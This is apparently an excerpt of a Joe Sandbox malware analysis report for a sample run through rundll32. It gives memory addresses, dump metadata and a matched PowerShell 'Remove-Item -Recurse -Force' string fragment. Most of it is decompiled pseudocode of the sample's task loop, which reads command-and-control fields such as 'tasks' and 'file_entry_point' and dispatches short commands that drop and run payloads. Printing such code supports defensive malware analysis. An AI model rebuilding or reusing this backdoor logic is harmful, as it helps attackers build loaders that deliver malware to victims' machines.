                                        0x21ef2fea796
                                        0x21ef2fea79c
                                        0x21ef2fea7a3
                                        0x21ef2fea7ad
                                        0x21ef2fea7b6
                                        0x21ef2fea7bb
                                        0x21ef2fea7c3
                                        0x21ef2fea7c7
                                        0x21ef2fea7cc
                                        0x21ef2fea7d4
                                        0x21ef2fea7da
                                        0x21ef2fea7e4
                                        0x21ef2fea7ed
                                        0x21ef2fea7f3
                                        0x21ef2fea7fa
                                        0x21ef2fea800
                                        0x21ef2fea807
                                        0x21ef2fea811
                                        0x21ef2fea817
                                        0x21ef2fea821
                                        0x21ef2fea834
                                        0x21ef2fea837
                                        0x21ef2fea842
                                        0x21ef2fea848
                                        0x21ef2fea84d
                                        0x21ef2fea852
                                        0x21ef2fea853
                                        0x21ef2fea858
                                        0x21ef2fea859
                                        0x21ef2fea85e
                                        0x21ef2fea85f
                                        0x21ef2fea865
                                        0x21ef2fea86a
                                        0x21ef2fea86b
                                        0x21ef2fea870
                                        0x21ef2fea871
                                        0x21ef2fea876
                                        0x21ef2fea877
                                        0x21ef2fea87d
                                        0x21ef2fea882
                                        0x21ef2fea883
                                        0x21ef2fea888
                                        0x21ef2fea889
                                        0x21ef2fea88e
                                        0x21ef2fea88f
                                        0x21ef2fea895
                                        0x21ef2fea89a
                                        0x21ef2fea89b
                                        0x21ef2fea8a0
                                        0x21ef2fea8a1
                                        0x21ef2fea8a6
                                        0x21ef2fea8a7
                                        0x21ef2fea8ad
                                        0x21ef2fea8b2
                                        0x21ef2fea8b3
                                        0x21ef2fea8b8
                                        0x21ef2fea8b9
                                        0x21ef2fea8be
                                        0x21ef2fea8bf
                                        0x21ef2fea8c5
                                        0x21ef2fea8ca
                                        0x21ef2fea8cb
                                        0x21ef2fea8d0
                                        0x21ef2fea8d1
                                        0x21ef2fea8d6
                                        0x21ef2fea8d7
                                        0x21ef2fea8dd
                                        0x21ef2fea8e0
                                        0x21ef2fea8e8
                                        0x21ef2fea8f2
                                        0x21ef2fea8f6
                                        0x21ef2fea904
                                        0x21ef2fea910
                                        0x21ef2fea931
                                        0x21ef2fea94d
                                        0x21ef2fea951
                                        0x21ef2fea96a
                                        0x21ef2fea96f
                                        0x21ef2fea973
                                        0x21ef2fea977
                                        0x21ef2fea97f
                                        0x21ef2fea983
                                        0x21ef2fea98b
                                        0x21ef2fea999
                                        0x21ef2fea99f
                                        0x21ef2fea9a4
                                        0x21ef2fea9a9
                                        0x21ef2fea9b2
                                        0x21ef2fea9b7
                                        0x21ef2fea9bc
                                        0x21ef2fea9ce
                                        0x21ef2fea9d4
                                        0x21ef2fea9e3
                                        0x21ef2fea9f0
                                        0x21ef2fea9fa
                                        0x21ef2feaa1c
                                        0x21ef2feaa21
                                        0x21ef2feaa33
                                        0x21ef2feaa3c
                                        0x21ef2feaa48
                                        0x21ef2feaa4d
                                        0x21ef2feaa5f
                                        0x21ef2feaa73
                                        0x21ef2feaa83
                                        0x21ef2feaa89
                                        0x21ef2feaa8e
                                        0x21ef2feaa96

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$powershell
                                        • API String ID: 3472027048-3626569723
                                        • Opcode ID: b7370d6ff2a21ae0597d7008802c5dbc846767d2fe6d0dd7cdceceb1a8f8ddb9
                                        • Instruction ID: bdb1031ac08a4bd86f7687f4599668eca3d350fa6efc35189b689c0c27a60f2e
                                        • Opcode Fuzzy Hash: b7370d6ff2a21ae0597d7008802c5dbc846767d2fe6d0dd7cdceceb1a8f8ddb9
                                        • Instruction Fuzzy Hash: 5722BF33221A8685FF21AB74CC493DE23B1F760748F510A159E5A17EDAEF78C686C384
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE9819 Relevance: 21.5, APIs: 8, Strings: 4, Instructions: 458sleepCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E0000021E21EF2FE9819() {
				void* _t389;
				signed int _t422;
				void* _t425;
				void* _t427;
				void* _t447;
				signed int _t464;
				void* _t469;
				void* _t473;
				signed char _t511;
				signed char _t514;
				signed char _t516;
				signed char _t523;
				signed char _t527;
				void* _t559;
				void* _t563;
				void* _t698;
				intOrPtr _t699;
				intOrPtr _t701;
				intOrPtr _t702;
				signed long long* _t704;
				intOrPtr _t705;
				intOrPtr _t707;
				intOrPtr _t708;
				intOrPtr _t710;
				signed long long _t712;
				signed long long _t715;
				signed long long _t717;
				signed long long _t720;
				signed int* _t724;
				signed long long _t726;
				signed long long _t729;
				signed long long _t731;
				signed long long _t733;
				signed long long _t736;
				signed long long _t738;
				signed long long _t740;
				signed long long _t743;
				signed long long _t745;
				signed long long _t748;
				signed long long _t750;
				intOrPtr _t756;
				intOrPtr _t758;
				intOrPtr _t759;
				long long _t761;
				intOrPtr _t762;
				intOrPtr _t764;
				intOrPtr _t765;
				intOrPtr _t767;
				intOrPtr _t768;
				intOrPtr _t770;
				void* _t773;
				signed long long _t774;
				signed long long _t775;
				signed long long _t777;
				signed long long _t779;
				signed long long _t781;
				signed long long _t783;
				signed long long _t785;
				void* _t787;
				intOrPtr _t791;
				intOrPtr _t792;
				void* _t793;
				intOrPtr _t795;
				void* _t796;
				intOrPtr _t805;
				void* _t806;
				intOrPtr _t808;
				void* _t809;
				intOrPtr _t855;
				void* _t856;
				intOrPtr _t858;
				void* _t859;
				intOrPtr _t882;
				void* _t883;
				intOrPtr _t893;
				void* _t894;
				intOrPtr _t896;
				void* _t897;
				void* _t914;
				void* _t975;
				signed long long _t976;
				intOrPtr _t978;
				void* _t979;
				void* _t980;
				signed long long _t981;
				signed long long _t985;
				intOrPtr _t987;
				long long* _t988;
				void* _t989;
				signed long long _t992;
				signed long long _t995;
				signed long long _t999;
				void* _t1019;
				void* _t1027;
				signed long long _t1030;
				signed long long _t1031;
				signed long long _t1032;
				signed long long _t1033;
				signed long long _t1034;
				signed long long _t1036;

				r8d = E0000021E21EF3111C60(_t698);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t511 = r8d * 0x3e8;
				Sleep(??);
				_t699 =  *((intOrPtr*)(_t988 - 0x78));
				if (_t699 - 0x10 < 0) goto 0xf2fe9892;
				_t792 =  *((intOrPtr*)(_t989 + 0x70));
				if (_t699 + 1 - _t975 < 0) goto 0xf2fe988d;
				if ((_t511 & 0x0000001f) != 0) goto 0xf2fea85f;
				_t701 =  *((intOrPtr*)(_t792 - 8));
				if (_t701 - _t792 >= 0) goto 0xf2fea859;
				_t793 = _t792 - _t701;
				if (_t793 - 8 < 0) goto 0xf2fea853;
				if (_t793 - 0x27 > 0) goto 0xf2fea84d;
				0xf310ba8c();
				 *((long long*)(_t988 - 0x78)) = 0xf;
				 *(_t988 - 0x80) = _t1034;
				 *((char*)(_t989 + 0x70)) = 0;
				_t702 =  *((intOrPtr*)(_t988 - 0x38));
				if (_t702 - 0x10 < 0) goto 0xf2fe98ee;
				_t795 =  *((intOrPtr*)(_t988 - 0x50));
				if (_t702 + 1 - _t975 < 0) goto 0xf2fe98e9;
				if ((_t511 & 0x0000001f) != 0) goto 0xf2fea877;
				_t704 =  *((intOrPtr*)(_t795 - 8));
				if (_t704 - _t795 >= 0) goto 0xf2fea871;
				_t796 = _t795 - _t704;
				if (_t796 - 8 < 0) goto 0xf2fea86b;
				if (_t796 - 0x27 > 0) goto 0xf2fea865;
				0xf310ba8c();
				 *((long long*)(_t988 - 0x38)) = 0xf;
				 *(_t988 - 0x40) = _t1034;
				 *((char*)(_t988 - 0x50)) = 0;
				goto 0xf2fe9742;
				if ( *(_t988 + 0x60) == 0) goto 0xf2fe9956;
				_t916 =  >=  ?  *((void*)(_t988 + 0x50)) : _t988 + 0x50;
				r8d =  *(_t988 + 0x60);
				E0000021E21EF2FE1080(_t988 + 0x480,  >=  ?  *((void*)(_t988 + 0x50)) : _t988 + 0x50);
				_t918 =  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70;
				r8d =  *(_t988 - 0x80);
				E0000021E21EF2FE1290(E0000021E21EF2FE1400( *((long long*)(_t988 - 0x78)) - 0x10, _t988 + 0x480,  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70), _t988 + 0x480);
				 *(_t988 + 0xc0) = _t704;
				 *(_t988 + 0xc8) = _t704;
				 *((intOrPtr*)(_t988 + 0xce)) = r15w;
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp+0xd0], xmm0");
				asm("xorps xmm1, xmm1");
				asm("movdqa [ebp+0xe0], xmm1");
				asm("movdqa [ebp+0xf0], xmm0");
				 *(_t988 + 0x100) = _t1034;
				 *((long long*)(_t988 + 0x108)) = 0x400;
				 *(_t988 + 0x110) = r15d;
				 *(_t988 + 0x118) = _t1034;
				if ( *(_t988 + 0xd0) != _t704) goto 0xf2fe99e9;
				E0000021E21EF310B674(_t704, _t988 + 0x480);
				 *(_t988 + 0x330) = _t704;
				 *_t704 = _t1034;
				_t704[1] = 0x10000;
				_t704[2] = _t1034;
				_t704[3] = _t1034;
				_t704[4] = _t1034;
				 *(_t988 + 0xd0) = _t704;
				 *(_t988 + 0xd8) = _t704;
				_t920 =  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70;
				_t52 = _t988 + 0xc0; // 0xc3
				E0000021E21EF2FEBB60(_t773, _t52,  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70, _t980);
				if (_t704[0xa] == 0) goto 0xf2fe9b18;
				r8d = E0000021E21EF3111C60(_t704);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t514 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t988 + 0xd8) == 0) goto 0xf2fe9a4f;
				_t389 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t773,  *(_t988 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				_t705 =  *((intOrPtr*)(_t988 - 0x78));
				if (_t705 - 0x10 < 0) goto 0xf2fe9ab7;
				_t805 =  *((intOrPtr*)(_t989 + 0x70));
				if (_t705 + 1 - _t975 < 0) goto 0xf2fe9ab2;
				if ((_t514 & 0x0000001f) != 0) goto 0xf2fea88f;
				_t707 =  *((intOrPtr*)(_t805 - 8));
				if (_t707 - _t805 >= 0) goto 0xf2fea889;
				_t806 = _t805 - _t707;
				if (_t806 - 8 < 0) goto 0xf2fea883;
				if (_t806 - 0x27 > 0) goto 0xf2fea87d;
				0xf310ba8c();
				 *((long long*)(_t988 - 0x78)) = 0xf;
				 *(_t988 - 0x80) = _t1034;
				 *((char*)(_t989 + 0x70)) = 0;
				_t708 =  *((intOrPtr*)(_t988 - 0x38));
				if (_t708 - 0x10 < 0) goto 0xf2fe98ee;
				_t808 =  *((intOrPtr*)(_t988 - 0x50));
				if (_t708 + 1 - _t975 < 0) goto 0xf2fe98e9;
				if ((_t514 & 0x0000001f) != 0) goto 0xf2fea8a7;
				_t710 =  *((intOrPtr*)(_t808 - 8));
				if (_t710 - _t808 >= 0) goto 0xf2fea8a1;
				_t809 = _t808 - _t710;
				if (_t809 - 8 < 0) goto 0xf2fea89b;
				if (_t809 - 0x27 > 0) goto 0xf2fea895;
				goto 0xf2fe98e6;
				_t976 =  *((intOrPtr*)(_t988 - 0x30));
				_t774 = _t976;
				 *(_t988 + 8) = _t774;
				_t981 =  *(_t988 - 0x28);
				if (_t976 == _t981) goto 0xf2fe9b59;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t389, _t514, _t774 + 0x48), _t514, _t774 + 0x28), _t514, _t774);
				_t775 = _t774 + 0x70;
				 *(_t988 + 8) = _t775;
				if (_t775 != _t981) goto 0xf2fe9b30;
				_t1030 = _t976;
				 *(_t988 - 0x28) = _t976;
				if ( *((short*)(_t988 + 0xce)) != 3) goto 0xf2fea70b;
				_t712 =  *(_t988 + 0xc8) & 0xffffffff;
				_t777 = (_t775 << 5) + _t712;
				_t84 = _t988 + 0x338; // 0x33b
				_t85 = _t988 + 0xc0; // 0xc3
				E0000021E21EF2FEB470(_t559, _t777, _t85, _t84, 0xffffffff, _t988, "response_status");
				if ( *_t712 == _t777) goto 0xf2fe9c02;
				 *(_t988 + 0x40) = _t712;
				 *(_t988 + 0x48) = _t712;
				 *((short*)(_t988 + 0x4e)) = 0x405;
				_t715 =  *(_t988 + 0x48) & 0x00000000 | "response_status";
				 *(_t988 + 0x48) = _t715;
				 *(_t988 + 0x40) = 0xf;
				E0000021E21EF2FEBA50(_t988 + 0xc0, _t988 + 0x40, _t976, 0xffffffff, _t988, _t1030, _t1034);
				r12d =  *_t715;
				 *((intOrPtr*)(_t988 + 0x5e0)) = r12d;
				_t717 =  *(_t988 + 0xc8) & 0xffffffff;
				_t779 = (_t777 << 5) + _t717;
				_t97 = _t988 + 0x340; // 0x343
				_t98 = _t988 + 0xc0; // 0xc3
				E0000021E21EF2FEB470(_t559, _t779, _t98, _t97, 0xffffffff, _t988, "tasks");
				if ( *_t717 == _t779) goto 0xf2fea155;
				 *(_t988 + 0x30) = _t717;
				 *(_t988 + 0x38) = _t717;
				 *((short*)(_t988 + 0x3e)) = 0x405;
				_t720 =  *(_t988 + 0x38) & 0x00000000 | "tasks";
				 *(_t988 + 0x38) = _t720;
				 *(_t988 + 0x30) = 5;
				E0000021E21EF2FEBA50(_t988 + 0xc0, _t988 + 0x30, _t976, 0, _t988, _t1030, _t1034);
				if ( *((short*)(_t720 + 0xe)) != 4) goto 0xf2fea155;
				 *(_t988 + 0x70) = _t720;
				 *(_t988 + 0x78) = _t720;
				 *((short*)(_t988 + 0x7e)) = 0x405;
				 *(_t988 + 0x78) =  *(_t988 + 0x78) & 0x00000000 | "tasks";
				 *(_t988 + 0x70) = 5;
				E0000021E21EF2FEB090(E0000021E21EF2FEBA50(_t988 + 0xc0, _t988 + 0x70, _t976, 0, _t988, _t1030, _t1034),  *(_t988 + 0x78) & 0x00000000 | "tasks", _t988 + 0x1c8);
				_t724 =  *((intOrPtr*)(_t988 + 0x1c8));
				_t985 = _t724[2] & 0xffffffff;
				r15d =  *_t724;
				_t1036 = (_t1034 << 4) + _t985;
				if (_t985 == _t1036) goto 0xf2fea152;
				r12d = 0x1000;
				 *(_t988 + 0x250) = _t724;
				 *(_t988 + 0x258) = _t724;
				 *(_t988 + 0x258) = 0xf;
				 *(_t988 + 0x250) = _t724;
				 *((char*)(_t988 + 0x240)) = 0;
				 *(_t988 + 0x278) = _t724;
				 *(_t988 + 0x280) = _t724;
				 *(_t988 + 0x280) = 0xf;
				 *(_t988 + 0x278) = _t724;
				 *((char*)(_t988 + 0x268)) = 0;
				 *(_t988 + 0x298) = _t724;
				 *(_t988 + 0x2a0) = _t724;
				 *(_t988 + 0x2a0) = 0xf;
				 *(_t988 + 0x298) = _t724;
				 *((char*)(_t988 + 0x288)) = 0;
				if ( *((short*)(_t985 + 0xe)) != 3) goto 0xf2fea112;
				_t726 =  *(_t985 + 8) & 0xffffffff;
				_t781 = (_t779 << 5) + _t726;
				_t992 = "task_data";
				E0000021E21EF2FEB470(_t559, _t781, _t985, _t988 + 0x360, _t985, _t988, _t992);
				if ( *_t726 == _t781) goto 0xf2fe9e4e;
				 *(_t988 + 0x80) = _t726;
				 *(_t988 + 0x88) = _t726;
				 *((short*)(_t988 + 0x8e)) = 0x405;
				_t729 =  *(_t988 + 0x88) & 0x00000000 | "task_data";
				 *(_t988 + 0x88) = _t729;
				 *(_t988 + 0x80) = 9;
				E0000021E21EF2FEBA50(_t985, _t988 + 0x80, _t976, _t985, _t988, _t1030, _t1036);
				if (( *(_t729 + 0xe) & r12w) != 0) goto 0xf2fe9e27;
				_t731 =  *(_t729 + 8) & 0xffffffff;
				if ( *_t731 != 0) goto 0xf2fe9e31;
				r8d = 0;
				goto 0xf2fe9e3f;
				if ( *((char*)(_t731 + (_t992 | 0xffffffff) + 1)) != 0) goto 0xf2fe9e35;
				E0000021E21EF2FE6400(_t781, _t988 + 0x268, _t731, _t985, (_t992 | 0xffffffff) + 1);
				_t733 =  *(_t985 + 8) & 0xffffffff;
				_t783 = (_t781 << 5) + _t733;
				_t995 = "task";
				E0000021E21EF2FEB470(_t559, _t783, _t985, _t988 + 0x348, _t985, _t988, _t995);
				if ( *_t733 == _t783) goto 0xf2fe9f0d;
				 *(_t988 + 0x90) = _t733;
				 *(_t988 + 0x98) = _t733;
				 *((short*)(_t988 + 0x9e)) = 0x405;
				_t736 =  *(_t988 + 0x98) & 0x00000000 | "task";
				 *(_t988 + 0x98) = _t736;
				 *(_t988 + 0x90) = 4;
				E0000021E21EF2FEBA50(_t985, _t988 + 0x90, _t976, _t985, _t988, _t1030, _t1036);
				if (( *(_t736 + 0xe) & r12w) != 0) goto 0xf2fe9ee6;
				_t738 =  *(_t736 + 8) & 0xffffffff;
				if ( *_t738 != 0) goto 0xf2fe9ef0;
				r8d = 0;
				goto 0xf2fe9efe;
				if ( *((char*)(_t738 + (_t995 | 0xffffffff) + 1)) != 0) goto 0xf2fe9ef4;
				E0000021E21EF2FE6400(_t783, _t988 + 0x240, _t738, _t985, (_t995 | 0xffffffff) + 1);
				_t740 =  *(_t985 + 8) & 0xffffffff;
				_t785 = (_t783 << 5) + _t740;
				E0000021E21EF2FEB470(_t559, _t785, _t985, _t988 + 0x350, _t985, _t988, "task_id");
				if ( *_t740 == _t785) goto 0xf2fe9f9b;
				 *(_t988 + 0xa0) = _t740;
				 *(_t988 + 0xa8) = _t740;
				 *((short*)(_t988 + 0xae)) = 0x405;
				_t743 =  *(_t988 + 0xa8) & 0x00000000 | "task_id";
				 *(_t988 + 0xa8) = _t743;
				 *(_t988 + 0xa0) = 7;
				E0000021E21EF2FEBA50(_t985, _t988 + 0xa0, _t976, _t985, _t988, _t1030, _t1036);
				 *((intOrPtr*)(_t988 + 0x260)) =  *_t743;
				_t745 =  *(_t985 + 8) & 0xffffffff;
				_t787 = (_t785 << 5) + _t745;
				_t999 = "file_entry_point";
				E0000021E21EF2FEB470(_t559, _t787, _t985, _t988 + 0x358, _t985, _t988, _t999);
				if ( *_t745 == _t787) goto 0xf2fea05a;
				 *(_t988 + 0xb0) = _t745;
				 *(_t988 + 0xb8) = _t745;
				 *((short*)(_t988 + 0xbe)) = 0x405;
				_t748 =  *(_t988 + 0xb8) & 0x00000000 | "file_entry_point";
				 *(_t988 + 0xb8) = _t748;
				 *(_t988 + 0xb0) = 0x10;
				E0000021E21EF2FEBA50(_t985, _t988 + 0xb0, _t976, _t985, _t988, _t1030, _t1036);
				if (( *(_t748 + 0xe) & r12w) != 0) goto 0xf2fea033;
				_t750 =  *(_t748 + 8) & 0xffffffff;
				if ( *_t750 != 0) goto 0xf2fea03d;
				r8d = 0;
				goto 0xf2fea04b;
				if ( *((char*)(_t750 + (_t999 | 0xffffffff) + 1)) != 0) goto 0xf2fea041;
				_t422 = E0000021E21EF2FE6400(_t787, _t988 + 0x288, _t750, _t985, (_t999 | 0xffffffff) + 1);
				if (_t988 + 0x240 - _t1030 >= 0) goto 0xf2fea0d3;
				if (_t976 - _t988 + 0x240 > 0) goto 0xf2fea0d3;
				if (_t1030 !=  *((intOrPtr*)(_t988 - 0x20))) goto 0xf2fea0b1;
				E0000021E21EF2FEB0F0(_t422 * (_t988 + 0x240 - _t976), _t988 - 0x30);
				_t1031 =  *(_t988 - 0x28);
				 *(_t988 + 8) = _t1031;
				 *(_t988 + 0x1d0) = _t1031;
				if (_t1031 == 0) goto 0xf2fea0d1;
				_t425 = E0000021E21EF2FEBCF0(_t750 >> 5 >> 0x3f, (_t750 >> 5) + (_t750 >> 5 >> 0x3f), _t1031, ((_t750 >> 5) + (_t750 >> 5 >> 0x3f)) * 0x70 +  *((intOrPtr*)(_t988 - 0x30)), _t1019);
				goto 0xf2fea10a;
				if (_t1031 !=  *((intOrPtr*)(_t988 - 0x20))) goto 0xf2fea0ea;
				E0000021E21EF2FEB0F0(_t425, _t988 - 0x30);
				_t1032 =  *(_t988 - 0x28);
				_t978 =  *((intOrPtr*)(_t988 - 0x30));
				 *(_t988 + 0x1d0) = _t1032;
				 *(_t988 + 8) = _t1032;
				if (_t1032 == 0) goto 0xf2fea10a;
				_t427 = E0000021E21EF2FEBCF0(_t750 >> 5 >> 0x3f, (_t750 >> 5) + (_t750 >> 5 >> 0x3f), _t1032, _t988 + 0x240, _t1019);
				_t1033 = _t1032 + 0x70;
				 *(_t988 - 0x28) = _t1033;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t427, _t514, _t988 + 0x288), _t514, _t988 + 0x268), _t514, _t988 + 0x240);
				if (_t985 + 0x10 != _t1036) goto 0xf2fe9d10;
				r12d =  *((intOrPtr*)(_t988 + 0x5e0));
				r13d = 3;
				r15d = 0;
				if (r12d != 1) goto 0xf2fea70b;
				if (_t978 != _t1033) goto 0xf2fea279;
				r8d = E0000021E21EF3111C60(_t750 >> 5 >> 0x3f);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t516 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t988 + 0xd8) == 0) goto 0xf2fea1a7;
				E0000021E21EF2FEB260(0x28c1979 * r8d, (_t750 >> 5) + (_t750 >> 5 >> 0x3f),  *(_t988 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				_t756 =  *((intOrPtr*)(_t988 - 0x78));
				if (_t756 - 0x10 < 0) goto 0xf2fea218;
				_t855 =  *((intOrPtr*)(_t989 + 0x70));
				if (_t756 + 1 - _t978 < 0) goto 0xf2fea213;
				if ((_t516 & 0x0000001f) != 0) goto 0xf2fea8bf;
				_t758 =  *((intOrPtr*)(_t855 - 8));
				if (_t758 - _t855 >= 0) goto 0xf2fea8b9;
				_t856 = _t855 - _t758;
				if (_t856 - 8 < 0) goto 0xf2fea8b3;
				if (_t856 - 0x27 > 0) goto 0xf2fea8ad;
				0xf310ba8c();
				 *((long long*)(_t988 - 0x78)) = 0xf;
				 *(_t988 - 0x80) = _t1036;
				 *((char*)(_t989 + 0x70)) = 0;
				_t759 =  *((intOrPtr*)(_t988 - 0x38));
				if (_t759 - 0x10 < 0) goto 0xf2fe98ee;
				_t858 =  *((intOrPtr*)(_t988 - 0x50));
				if (_t759 + 1 - _t978 < 0) goto 0xf2fe98e9;
				if ((_t516 & 0x0000001f) != 0) goto 0xf2fea8d7;
				_t761 =  *((intOrPtr*)(_t858 - 8));
				if (_t761 - _t858 >= 0) goto 0xf2fea8d1;
				_t859 = _t858 - _t761;
				if (_t859 - 8 < 0) goto 0xf2fea8cb;
				if (_t859 - 0x27 > 0) goto 0xf2fea8c5;
				goto 0xf2fe98e6;
				r12d = 1;
				_t236 = _t988 + 0x10; // 0x13
				E0000021E21EF2FE5D10(_t563, (_t750 >> 5) + (_t750 >> 5 >> 0x3f), _t236, _t978 + 0x28);
				_t987 =  *((intOrPtr*)(_t978 + 0x18));
				if (_t987 - 0x10 < 0) goto 0xf2fea29d;
				goto 0xf2fea2a0;
				_t791 =  *((intOrPtr*)(_t978 + 0x10));
				_t1003 =  <  ? _t791 : 0xffffffff;
				_t640 =  <  ? _t791 : 0xffffffff;
				if (( <  ? _t791 : 0xffffffff) == 0) goto 0xf2fea2c8;
				if (E0000021E21EF310E7C0(_t516, _t978, "shi",  <  ? _t791 : 0xffffffff) != 0) goto 0xf2fea382;
				if (_t791 != 3) goto 0xf2fea382;
				r8d = 0x208;
				E0000021E21EF310E410(_t516, 0, 0x1000, _t563, 0xf320b2a0, "shi", _t978,  <  ? _t791 : 0xffffffff);
				E0000021E21EF3111C60(_t761);
				r9d = 0;
				_t245 = _t1019 + 0x26; // 0x26
				r8d = _t245;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t988 + 0x170)) = _t761;
				 *((long long*)(_t988 + 0x178)) = _t761;
				 *((long long*)(_t988 + 0x180)) = _t761;
				E0000021E21EF3017F50(_t761, _t791, _t988 + 0x170, _t978, _t987, _t1019);
				if ( *((intOrPtr*)(_t988 + 0x180)) == 0) goto 0xf2fea2e0;
				r13d = 3;
				_t253 = _t988 + 0x10; // 0x13
				E0000021E21EF2FE7390(_t761,  *((intOrPtr*)(_t988 + 0x170)),  *((intOrPtr*)(_t988 + 0x178)), _t253, 0xf31b0230);
				goto 0xf2fea618;
				if (_t987 - 0x10 < 0) goto 0xf2fea38d;
				goto 0xf2fea390;
				_t1006 =  <  ? _t791 : 0xf31b0230;
				_t646 =  <  ? _t791 : 0xf31b0230;
				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea3b4;
				if (E0000021E21EF310E7C0(0, _t978, "dij",  <  ? _t791 : 0xf31b0230) != 0) goto 0xf2fea46f;
				if (_t791 != 3) goto 0xf2fea46f;
				asm("o16 nop [eax+eax]");
				r8d = 0x208;
				E0000021E21EF310E410(0, 0, 0x1000, _t563, 0xf320b2a0, "dij", _t978,  <  ? _t791 : 0xf31b0230);
				_t447 = E0000021E21EF3111C60(_t761);
				r9d = 0;
				_t262 = _t1019 + 0x26; // 0x26
				r8d = _t262;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t988 + 0x158)) = _t761;
				 *((long long*)(_t988 + 0x160)) = _t761;
				 *((long long*)(_t988 + 0x168)) = _t761;
				E0000021E21EF3017F50(_t761, _t791, _t988 + 0x158, _t978, _t987, _t1019);
				if ( *((intOrPtr*)(_t988 + 0x168)) == 0) goto 0xf2fea3d0;
				E0000021E21EF2FE7560(_t791,  *((intOrPtr*)(_t988 + 0x158)),  *((intOrPtr*)(_t988 + 0x160)), _t987, _t988, _t988 + 0x10, _t978 + 0x48);
				goto 0xf2fea618;
				if (_t987 - 0x10 < 0) goto 0xf2fea47a;
				goto 0xf2fea47d;
				_t1009 =  <  ? _t791 : 0xf31b0230;
				_t652 =  <  ? _t791 : 0xf31b0230;
				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea49d;
				if (E0000021E21EF310E7C0(0, _t978, "dex",  <  ? _t791 : 0xf31b0230) != 0) goto 0xf2fea504;
				if (_t791 != 3) goto 0xf2fea504;
				r9d = 0;
				r8d = _t791 + 0x19;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				_t959 =  >=  ?  *((void*)(_t988 + 0x10)) : _t988 + 0x10;
				r8d =  *(_t988 + 0x20);
				if (E0000021E21EF301B91C(_t761, _t791, 0xf320b2a0,  >=  ?  *((void*)(_t988 + 0x10)) : _t988 + 0x10, _t987, _t978 + 0x48) == 0) goto 0xf2fea620;
				0xf301c460();
				goto 0xf2fea61c;
				if (_t987 - 0x10 < 0) goto 0xf2fea50f;
				goto 0xf2fea512;
				_t1011 =  <  ? _t791 : 0xf31b0230;
				_t659 =  <  ? _t791 : 0xf31b0230;
				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea537;
				if (E0000021E21EF310E7C0(0, _t978, "sdl",  <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea537;
				r15d = 0;
				goto 0xf2fea552;
				if (_t791 - 3 >= 0) goto 0xf2fea545;
				r15d = 0;
				goto 0xf2fea552;
				r15d = 0;
				if ((r15d & 0xffffff00 | _t791 - 0x00000003 > 0x00000000) == 0) goto 0xf2feaab5;
				if (_t987 - 0x10 < 0) goto 0xf2fea565;
				goto 0xf2fea568;
				_t1013 =  <  ? _t791 : 0xf31b0230;
				_t666 =  <  ? _t791 : 0xf31b0230;
				if (( <  ? _t791 : 0xf31b0230) == 0) goto 0xf2fea58c;
				if (E0000021E21EF310E7C0(0, _t978, "ins",  <  ? _t791 : 0xf31b0230) != 0) goto 0xf2fea620;
				if (_t791 - 3 >= 0) goto 0xf2fea597;
				goto 0xf2fea5a1;
				_t464 = r15d & 0xffffff00 | _t791 - 0x00000003 > 0x00000000;
				if (_t464 != 0) goto 0xf2fea620;
				if ( *((intOrPtr*)(_t988 + 0x5d8)) == _t464) goto 0xf2fea5e8;
				r8d = E0000021E21EF3111C60(_t761);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t523 = r8d * 0x3e8;
				Sleep(??);
				E0000021E21EF2FE6100(0x28c1979 * r8d, _t523, _t988 + 0x10);
				goto 0xf2fea681;
				 *((char*)(_t989 + 0x20)) = 0;
				_t469 = E0000021E21EF2FE76A0(0x28c1979 * r8d >> 0x20 >> 1, _t791, _t988 + 0x2b0, _t988 + 0x420, _t978, _t987, _t988 + 0x188, _t988 + 0x138, _t1027);
				if (_t469 != 0) goto 0xf2fea8dd;
				goto 0xf2fea5ad;
				if (_t469 == 0) goto 0xf2fea620;
				 *((intOrPtr*)(_t978 + 0x68)) = r12d;
				_t762 =  *((intOrPtr*)(_t988 + 0x28));
				if (_t762 - 0x10 < 0) goto 0xf2fea66e;
				_t882 =  *((intOrPtr*)(_t988 + 0x10));
				if (_t762 + 1 - 0x1000 < 0) goto 0xf2fea669;
				if ((_t523 & 0x0000001f) != 0) goto 0xf2feaaaf;
				_t764 =  *((intOrPtr*)(_t882 - 8));
				if (_t764 - _t882 >= 0) goto 0xf2feaaa9;
				_t883 = _t882 - _t764;
				if (_t883 - 8 < 0) goto 0xf2feaaa3;
				if (_t883 - 0x27 > 0) goto 0xf2feaa9d;
